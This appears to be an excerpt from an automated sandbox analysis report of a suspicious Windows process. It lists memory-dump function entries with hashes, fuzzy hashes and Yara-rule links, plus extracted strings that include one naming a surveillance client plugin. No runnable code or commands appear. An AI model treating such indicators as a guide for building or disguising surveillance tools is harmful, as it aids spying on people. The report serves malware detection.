Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b492bea398b057d6eea31d2ed88643c8f6f87aeaaf5ac31c5590d8c1f8dd16b
Instruction ID: b30fadb42fef19180e1f6b61b9a5176f7f237e8136ae04d0e385787be0a4320e
Opcode Fuzzy Hash: 8b492bea398b057d6eea31d2ed88643c8f6f87aeaaf5ac31c5590d8c1f8dd16b
Instruction Fuzzy Hash: 02E02B347081948FCF07A774582D9B93FA64F8524532201AFE047C7FA6CD254D118712

Uniqueness

Uniqueness Score: -1.00%

Function 003CF0C0, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50c040cdb2fa546ad50b2d50136eb6419b591a805257906fff6d309b7668782c
Instruction ID: 5dfa57aa0061a9badb719be1a5e7700251d49793c16bd1813c159d33fddf3f38
Opcode Fuzzy Hash: 50c040cdb2fa546ad50b2d50136eb6419b591a805257906fff6d309b7668782c
Instruction Fuzzy Hash: 9BE026763482D01FEB059AB998119FA7BA68ED3704308849FE947EF393CA528C028390

Uniqueness

Uniqueness Score: -1.00%

Function 003CE570, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8d518248afcd9931e025e601c3851f94ec427fcf5171e3c014e3421f6b5d81
Instruction ID: fe0daf0b490d76c77694722c2b2c2b49c26a74d6cc2aa5c92a6ba4f79da6c4f0
Opcode Fuzzy Hash: 5f8d518248afcd9931e025e601c3851f94ec427fcf5171e3c014e3421f6b5d81
Instruction Fuzzy Hash: 69E0DF353102005B8716D258D520AAAB799CBC6764310882EE00ACB700EF63DC0247E0

Uniqueness

Uniqueness Score: -1.00%

Function 003CF198, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c9756b4a5e6a1d23c2550e18c9084ced46abbe3c0dcdaa438dffc9ccc4cf27
Instruction ID: 1bc264f17c0f4d0a569f2cdad03491710a220817588d490850fff1d870e094a4
Opcode Fuzzy Hash: b5c9756b4a5e6a1d23c2550e18c9084ced46abbe3c0dcdaa438dffc9ccc4cf27
Instruction Fuzzy Hash: 10E0DF363002119B8716D258D91096AB3AACBC2760398843EE40AEB700DF62DC024BD0

Uniqueness

Uniqueness Score: -1.00%

Function 003CB2F8, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47bb7c5a2cf14193fc0c8cbb7f9de5d2dfb5b77dbb181cea9b12219706207a42
Instruction ID: 2188eb67b52764e85782e3c7603421affcf883885e141f5ccc777d4da22c6f33
Opcode Fuzzy Hash: 47bb7c5a2cf14193fc0c8cbb7f9de5d2dfb5b77dbb181cea9b12219706207a42
Instruction Fuzzy Hash: 2BF01C345146908FC7668A198191BAAF7E5FF45351FA4482EE087C7E50C3A2FC828B40

Uniqueness

Uniqueness Score: -1.00%

Function 001AAD3F, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393456462.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e51c6dd477d0ff1d5f904c13e2946ba6b02f0804c0e47419ae3bce0e2103ef1
Instruction ID: 6c68231aae005ada8d3bdd77e27a144a9b6a16bd1fa20e31552cf3d07245aaf2
Opcode Fuzzy Hash: 6e51c6dd477d0ff1d5f904c13e2946ba6b02f0804c0e47419ae3bce0e2103ef1
Instruction Fuzzy Hash: 49E04872A407446BD250DE06DC46F52F758EB40A70F04C567EE0D5B702E176B5148AF5

Uniqueness

Uniqueness Score: -1.00%

Function 003C6108, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea71424e714ca06bfe1fe54b59e82c3abee3a6e70e4dfd0f34ff2d563c2e615
Instruction ID: 693e34fb87f5b45b201c95b7734b8f8bb6f050f2fb7c335107690026591a6d38
Opcode Fuzzy Hash: eea71424e714ca06bfe1fe54b59e82c3abee3a6e70e4dfd0f34ff2d563c2e615
Instruction Fuzzy Hash: 48E04F253482945FD705A6B948618B97F9A8B8765030984EAE445DB253CA579C0283D1

Uniqueness

Uniqueness Score: -1.00%

Function 003CCD98, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78431ffaa40b5b94807922498001f4815a81e9dc7c3b5c399f14d4c91e924330
Instruction ID: 25fdc7ecceb992ed7b06dcd24f7cbcc3c42d6557f6266f24ced904a21bf809cc
Opcode Fuzzy Hash: 78431ffaa40b5b94807922498001f4815a81e9dc7c3b5c399f14d4c91e924330
Instruction Fuzzy Hash: 45E01232324055DB4609225D9029D7D7BAEDAC566137410BEE10FC7751DE519C015396

Uniqueness

Uniqueness Score: -1.00%

Function 003CCDD1, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65d33ae414b74f27678899af8c4eb1e78dc57c00eefc601734c236036e674b9
Instruction ID: 52f57e88aef46893c929f0cf9aa0a97b2ecb53e714f924370dacd4ac36cbd5f8
Opcode Fuzzy Hash: e65d33ae414b74f27678899af8c4eb1e78dc57c00eefc601734c236036e674b9
Instruction Fuzzy Hash: 02E092316046509FC725872CD451F7ABBA5EFC6329B15866ED84E97A42C671BC02DB80

Uniqueness

Uniqueness Score: -1.00%

Function 003C8730, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4b4b5fc980800666206a676fded51e97588618fbfde16f23c513f00abd30888
Instruction ID: 25b1fc2e3a3d46a00fb71bbe9b578ca16a9f48a049d15dff6810f0bc4a890e68
Opcode Fuzzy Hash: c4b4b5fc980800666206a676fded51e97588618fbfde16f23c513f00abd30888
Instruction Fuzzy Hash: 5FE0ED3121430EDBC701EF64FC80E987369BA413847B4C51EE401CB92DFA78AF05AB82

Uniqueness

Uniqueness Score: -1.00%

Function 003C2D98, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc0f5bf14ee512de7904216676170ac1e7e0ac4589859c00d59d4c044d5b6166
Instruction ID: c77f079cac687d150ab5c91f368feca570e2fcf50148c98bd68ca932475ccadd
Opcode Fuzzy Hash: fc0f5bf14ee512de7904216676170ac1e7e0ac4589859c00d59d4c044d5b6166
Instruction Fuzzy Hash: 65D0173408C3E4DFC2474668082AFA13F684B23700F2A09EBA9A7CA8A285021806D762

Uniqueness

Uniqueness Score: -1.00%

Function 003C44E0, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055f028b4337e902f2aa7155359c58c5a978ab1e1e8ad1eba0a9c50f6059779c
Instruction ID: beffe78a375778b0111b47508de0df2ee66a560a3004c8e82f3058377790097b
Opcode Fuzzy Hash: 055f028b4337e902f2aa7155359c58c5a978ab1e1e8ad1eba0a9c50f6059779c
Instruction Fuzzy Hash: CAE09A31804609C7CF10AF68CC248DAF3B5FF86300B218A18E54633654EB34B9A0CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003C6078, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce2f26a5a5be57b27a11d8bc0d300ecbc4f6b3df3df726168a97aca217537b3
Instruction ID: b3f3c52f4c43f7ffb43cf953da7c42d0e650cead2ac3f138ce42a77e8020e766
Opcode Fuzzy Hash: 7ce2f26a5a5be57b27a11d8bc0d300ecbc4f6b3df3df726168a97aca217537b3
Instruction Fuzzy Hash: EED0A72171022D27EE0976BE5C05A3F728E9BC2B913088028F406EB341DE228C4183F5

Uniqueness

Uniqueness Score: -1.00%

Function 003CE5B0, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 593c2f47baca7c2e6fa4d7317213cc44e66d7d14588d5775f80a1f2de30f1781
Instruction ID: 32e407b34c8c889c6ade81c383ec0147a68532d3d0a6bf4a9d42e921f9671d40
Opcode Fuzzy Hash: 593c2f47baca7c2e6fa4d7317213cc44e66d7d14588d5775f80a1f2de30f1781
Instruction Fuzzy Hash: 24E02630009351CBD7125B109410E933B2A5A07718321029FC196CB992E731EC09D700

Uniqueness

Uniqueness Score: -1.00%

Function 003C65E0, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0affedf8b45b4e31dd0eb76fc81e42d467de92876b48af39b665d29376e1635e
Instruction ID: c53b18ac38dd19237531be69f7e211663d6c758ddba032e1c5bb964d20880169
Opcode Fuzzy Hash: 0affedf8b45b4e31dd0eb76fc81e42d467de92876b48af39b665d29376e1635e
Instruction Fuzzy Hash: 48D05B3164845583E20136B85816B77368D5746791F24003FDA0AC3651DF968C9057FB

Uniqueness

Uniqueness Score: -1.00%

Function 003C02A0, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adae9583846de69fb33e3220d21119d6314881dd66d0f7a168595f22dbed0979
Instruction ID: fe397591bfd416543f328e2b6ea291f4eaae4dc48b72c8a695ee0dd4ab10aa47
Opcode Fuzzy Hash: adae9583846de69fb33e3220d21119d6314881dd66d0f7a168595f22dbed0979
Instruction Fuzzy Hash: A3E08C3160D7D0CBC35683A4A8688817BB4EF8B6003498D9FD0D6C6D51CA22AC01C381

Uniqueness

Uniqueness Score: -1.00%

Function 003CF0D0, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03c546e266a051b863ceb713f14f4f0f3bd9914d173aa596571c63b326fc5443
Instruction ID: f8a715ed19b6a60d993042b5cf1126be43742cdd187c5f443b36d5a03cfb0912
Opcode Fuzzy Hash: 03c546e266a051b863ceb713f14f4f0f3bd9914d173aa596571c63b326fc5443
Instruction Fuzzy Hash: D5D05E3534012427A608A5AD895187A738EDBC6A14308846DF40AEB341CE629C0243D0

Uniqueness

Uniqueness Score: -1.00%

Function 003C6118, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5756dba865fe74d68950731df27759c2b770a2b970affb31acfd15fee4f1477
Instruction ID: 5f67aec6a9c53e85e058e587a99815297a3ba7106d16d7e7513fc57998673654
Opcode Fuzzy Hash: c5756dba865fe74d68950731df27759c2b770a2b970affb31acfd15fee4f1477
Instruction Fuzzy Hash: EAD05E3534011427A608A5AD895286A738EDBC6654308846DB40AEB341CE639C0243D0

Uniqueness

Uniqueness Score: -1.00%

Function 003C59A6, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ce232cd03e122f333b044ef522840497e168d27dca1900f19beba874f303ddd
Instruction ID: c6836d5b67b7b21e58a9246526fc16fc48325539cbb99b152b560115883438f6
Opcode Fuzzy Hash: 2ce232cd03e122f333b044ef522840497e168d27dca1900f19beba874f303ddd
Instruction Fuzzy Hash: 40D0C272E15404CFCF00A7A49806AECB361AB8427272008BBD00AD7641DF302CA247A2

Uniqueness

Uniqueness Score: -1.00%

Function 003CF1E8, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c1515b2598de33c14a2ff6243fcf995fc4627b531c904ab08294159a8055a10
Instruction ID: 728f93baebaa6cd1ec24032f68f31778fce02b5e9c3c1a9d773df26b9ba930c6
Opcode Fuzzy Hash: 1c1515b2598de33c14a2ff6243fcf995fc4627b531c904ab08294159a8055a10
Instruction Fuzzy Hash: D4D05E3A108624DFC6665694E800FB3B3AFF748712734493EE55BC2D01C622EC41B391

Uniqueness

Uniqueness Score: -1.00%

Function 003C77A0, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6ef09b7658321b67ec72536894e64c1ee631c274af05606e4a98131ce4637c9
Instruction ID: 807b4a2d7511387c41bef2ad2d59ec8e89aac2e2c4c0049cdfe1b845b12557e7
Opcode Fuzzy Hash: e6ef09b7658321b67ec72536894e64c1ee631c274af05606e4a98131ce4637c9
Instruction Fuzzy Hash: 9ED0C23000C3588BD3374A349804F727B9D5B09B14F2409AECD4285D40CAAAAC84DBE2

Uniqueness

Uniqueness Score: -1.00%

Function 003C5618, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd2326b3a9f9b4e5dde177dbb1d60b0c80fbe6260fc09c0e17149f5f0f9019f8
Instruction ID: 8ddf58bd41693b035f6905ee49b176bc0d02c9a852386bdc979ead49f4e8c884
Opcode Fuzzy Hash: bd2326b3a9f9b4e5dde177dbb1d60b0c80fbe6260fc09c0e17149f5f0f9019f8
Instruction Fuzzy Hash: 0CD05E1044EBD14ECB1387301CA8AA43F648813301399A48FC082C6863EA125CBAA706

Uniqueness

Uniqueness Score: -1.00%

Function 001923F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393432091.0000000000192000.00000040.00000001.sdmp, Offset: 00192000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11fb2de37d2db66c5b39ece0abe10a75bd775fefab27d879a5504eb57649e2a8
Instruction ID: dff4f7f26e079170dee77cc646379ab9c83adbb2c5d1be2221528debd9a74779
Opcode Fuzzy Hash: 11fb2de37d2db66c5b39ece0abe10a75bd775fefab27d879a5504eb57649e2a8
Instruction Fuzzy Hash: 94D05E79304A819FDB168A1CC1A4B9537D4BB61B04F5644F9E800CB6A3C778E981D200

Uniqueness

Uniqueness Score: -1.00%

Function 003CE8B8, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e5b535b8be01fb24980a75d80456a59ea85c9972707710b2d9acde978d95f9a
Instruction ID: 9619480d1639182d6392efa0191b17c9a7584a9c388ff1c48836228c35297b2a
Opcode Fuzzy Hash: 9e5b535b8be01fb24980a75d80456a59ea85c9972707710b2d9acde978d95f9a
Instruction Fuzzy Hash: 9DC0C031504334D30B2631F528019DE735CCC02310B00007DEE08C7500F731DD1043D1

Uniqueness

Uniqueness Score: -1.00%

Function 003CE5C0, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e541c341f3131df73250ee48ebdfdda3a35b9aa79737cac2abfb804e1bf224d3
Instruction ID: 91dba25642dbde2757e3546e1808c8095a4e63ee8d05e8156625c419666c9c0d
Opcode Fuzzy Hash: e541c341f3131df73250ee48ebdfdda3a35b9aa79737cac2abfb804e1bf224d3
Instruction Fuzzy Hash: B0D02230008328CB87264780D410DA2736EDB0B32AB60067EC10BC3E00FB32FC40E780

Uniqueness

Uniqueness Score: -1.00%

Function 001923BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393432091.0000000000192000.00000040.00000001.sdmp, Offset: 00192000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96f7f3da7b99dfaaf4af471cdb02b118a5c0e5e324a61fd48bc85089566941e5
Instruction ID: 50564fb2bbcb1a7b90b4fbd212724361b12756776924f7930441e53406d01efb
Opcode Fuzzy Hash: 96f7f3da7b99dfaaf4af471cdb02b118a5c0e5e324a61fd48bc85089566941e5
Instruction Fuzzy Hash: 02D09E743406819BDB15DA1CD694F5977E4BB44704F1644E9FC108B666C7B8ED81D640

Uniqueness

Uniqueness Score: -1.00%

Function 003C7CCA, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5811b079459293158ff7ee94f5f8deb10a756494b8dcacac3099b8e669d48f1d
Instruction ID: 6a2f8cfa0193f2d7f659460dd93d80fa27c7e7360dc76f1eb56aa96334e58e74
Opcode Fuzzy Hash: 5811b079459293158ff7ee94f5f8deb10a756494b8dcacac3099b8e669d48f1d
Instruction Fuzzy Hash: 53D05270A26209CF8B02CF75D9108AD37F0BB09320320433ED8029BBC6EB340C008F90

Uniqueness

Uniqueness Score: -1.00%

Function 003CD540, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61f3546d836e3ba093f5a7cced8aa9e8615fb12516946e03d1390579c6a29632
Instruction ID: 1e1ec949bdac4eb2cb41c77e4dad1e9615590fcbd151ee27aef1d94747f41baa
Opcode Fuzzy Hash: 61f3546d836e3ba093f5a7cced8aa9e8615fb12516946e03d1390579c6a29632
Instruction Fuzzy Hash: A9D0522000CA80CFC303AB348841FAA3F702F43285FE500ACE082468A3E2A64A02D702

Uniqueness

Uniqueness Score: -1.00%

Function 003C5628, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6902be748365b8d65a4c88cbb57452aef78c9b09be4eff9d7368d3d66a6e10c9
Instruction ID: b6a18ba0a2ba26a87d0756c12a47103dfdd311a360e7dc6b035cc4e2887dc88d
Opcode Fuzzy Hash: 6902be748365b8d65a4c88cbb57452aef78c9b09be4eff9d7368d3d66a6e10c9
Instruction Fuzzy Hash: 5DD0C9300089048BD71267A46C0DB68BB5CAB16306B85504AE00AC0CA1DB246EE4DB56

Uniqueness

Uniqueness Score: -1.00%

Function 003C0180, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99085e43115712c5e55da4b3be8870ce86439dc01698e2609e58f6447019a9be
Instruction ID: fc90ed3281857473c192ebde425d136a3b29b705b16f89ba4bfecaa5f2a10b73
Opcode Fuzzy Hash: 99085e43115712c5e55da4b3be8870ce86439dc01698e2609e58f6447019a9be
Instruction Fuzzy Hash: 64D01231210305CFC7082B70E41D41C3775AB8960A384487CDC0A87B50DE3AE880CA40

Uniqueness

Uniqueness Score: -1.00%

Function 003C9650, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a7502379cbb4d9a8d1415569b17b6e4ca6fd8537e25ff92f1b555ea7b775b01
Instruction ID: b3cd985f27a8d08c97ef38a724cac529a2648224a8074755ba1d435cb7fe6a97
Opcode Fuzzy Hash: 2a7502379cbb4d9a8d1415569b17b6e4ca6fd8537e25ff92f1b555ea7b775b01
Instruction Fuzzy Hash: CDC02B303449090B97404BB028077A137CC1C00A04389C0689C4DC0011E053D4104380

Uniqueness

Uniqueness Score: -1.00%

Function 003C5CD8, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db8d93ca4c459518f6574c6ebd44dbb9cc1a2de5296b70c337c391916834602
Instruction ID: 6a0cf47c2eb76bf3f31efc6b47b7c1288491f496b3e117c870ba2f4721f58c9c
Opcode Fuzzy Hash: 5db8d93ca4c459518f6574c6ebd44dbb9cc1a2de5296b70c337c391916834602
Instruction Fuzzy Hash: CBC04C31244B098F9A012BB17C59B2E369C6B95615341416AA90AC9950EF64A8D05696

Uniqueness

Uniqueness Score: -1.00%

Function 003C94C8, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ee39ed4c9a024897badc93f2fa346dae821ae15f1cf7e04d0b4ba874d18022
Instruction ID: bd86a1c461989da60c63cdbea596dae06fdc99d1855731ef3fdd1d07a31ce0bb
Opcode Fuzzy Hash: 38ee39ed4c9a024897badc93f2fa346dae821ae15f1cf7e04d0b4ba874d18022
Instruction Fuzzy Hash: 8BC0922A28C208EAD95AD687BC0EF35720C4304B01E73405BB70FE4CD14591AD227756

Uniqueness

Uniqueness Score: -1.00%

Function 003C9658, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff46c1df3baeb256584ac607a06629bad9400ac1af85b4a3daff65b8f0f99dc
Instruction ID: 8657138079372106084efaaa413226dda851bb44f21b2538feec92a6b5697195
Opcode Fuzzy Hash: aff46c1df3baeb256584ac607a06629bad9400ac1af85b4a3daff65b8f0f99dc
Instruction Fuzzy Hash: 3DB092313546090AEB9097B57809B26328C9750B28F414066B80ED2950E5A6E8601184

Uniqueness

Uniqueness Score: -1.00%

Function 003C0660, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0a2548a702210dbe264f8f8865b48f5e98f52f79ab436c09c542f7b30fdee43
Instruction ID: 4232989cad7501e84ba20fc5ae7340674d67eea8ed50daf18d7bec97a49daf67
Opcode Fuzzy Hash: b0a2548a702210dbe264f8f8865b48f5e98f52f79ab436c09c542f7b30fdee43
Instruction Fuzzy Hash: 0DC09B7504D254CEC34D5FB55C05D3D765DD7D1305770C079E5014092199739D72A655

Uniqueness

Uniqueness Score: -1.00%

Function 003CEB74, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5348b08aa15e0c63ac257e624a53e5ccdf267e7c4dfaa15f848eebedb8d81e
Instruction ID: 5d2b4f6561db5a9c6c71f2dca72440ffc67cf7600523cb33956f54caa5bf897f
Opcode Fuzzy Hash: 0e5348b08aa15e0c63ac257e624a53e5ccdf267e7c4dfaa15f848eebedb8d81e
Instruction Fuzzy Hash: 54C04C36B480098EDF045B94F8453ECB765E78032AF100066D21E91881867506955791

Uniqueness

Uniqueness Score: -1.00%

Function 003CF118, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7ca81df2f59dd4a7ab345e5d786205baf7868ebaade09f8ebfcbbf30c7309dd
Instruction ID: 2da86c8caf1b35c0240e091248db621d851c79fc6cefffbdef1b4b54e0027f2d
Opcode Fuzzy Hash: a7ca81df2f59dd4a7ab345e5d786205baf7868ebaade09f8ebfcbbf30c7309dd
Instruction Fuzzy Hash: 80B01230144608479D0033F52819B2E724E0AD45053404026B80D8EA13DE2458508565

Uniqueness

Uniqueness Score: -1.00%

Function 003CD550, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a6b24fa1a03bfb67c6b7542d4f0ce3abe53f53aa038c8e6395598959641c458
Instruction ID: e078125f0f37f3edb1134ac78a6b86a9edd2d46084a768137e4e47dab48295e9
Opcode Fuzzy Hash: 6a6b24fa1a03bfb67c6b7542d4f0ce3abe53f53aa038c8e6395598959641c458
Instruction Fuzzy Hash: C5B09230009708EF8202B729DC05E69766CBA03241BD0403CF4028289A6B766E52E796

Uniqueness

Uniqueness Score: -1.00%

Function 003C2F38, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e4b44ba7da854b60001bc89c7d7f151ec96dfeef388b8830642b796d8c691e
Instruction ID: 4f58c0f0b5d2a50cb631c1e66cc7ea632d8e3bf0561d84e11207a1e5b6be4d11
Opcode Fuzzy Hash: c7e4b44ba7da854b60001bc89c7d7f151ec96dfeef388b8830642b796d8c691e
Instruction Fuzzy Hash: 97B0123030820E0A264057B23C48B17339C960051438400A8D40DC0410F540D8900544

Uniqueness

Uniqueness Score: -1.00%

Function 003CCB39, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f0788a27b8e46ac8c7b5627befd496c61d9ca0f907c6ac7885eb2b309297b1
Instruction ID: 6cf0e3219c7781d8d516c2cf3004fdcdeaaf39702f187f94292011eb70f7f624
Opcode Fuzzy Hash: 36f0788a27b8e46ac8c7b5627befd496c61d9ca0f907c6ac7885eb2b309297b1
Instruction Fuzzy Hash: 2DC0025600DAC44FD7265B3518663817FA26F87549F9A49DEC0E507563C42624128665

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003C9A53, Relevance: 6.4, Strings: 5, Instructions: 195COMMON

Download Yara Rule

Strings

*_qq, xrefs: 003C9AC7
, xrefs: 003C9B93
es/SurveillanceExClientPlugin.resources.EXE, xrefs: 003C9A9B, 003C9AB3
p=[, xrefs: 003C9C01
p>[, xrefs: 003C9A7D

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: $*_qq$es/SurveillanceExClientPlugin.resources.EXE$p=[$p>[
API String ID: 0-2658842248
Opcode ID: afdef81a7c28cafd6fd8d02d344a1cc3a144f93c413d7b2055e0e97b1a265d01
Instruction ID: 10cff11cd8060ae61d1f5597c3af56e11c29ed592b3b5eb7233c225dda152fcd
Opcode Fuzzy Hash: afdef81a7c28cafd6fd8d02d344a1cc3a144f93c413d7b2055e0e97b1a265d01
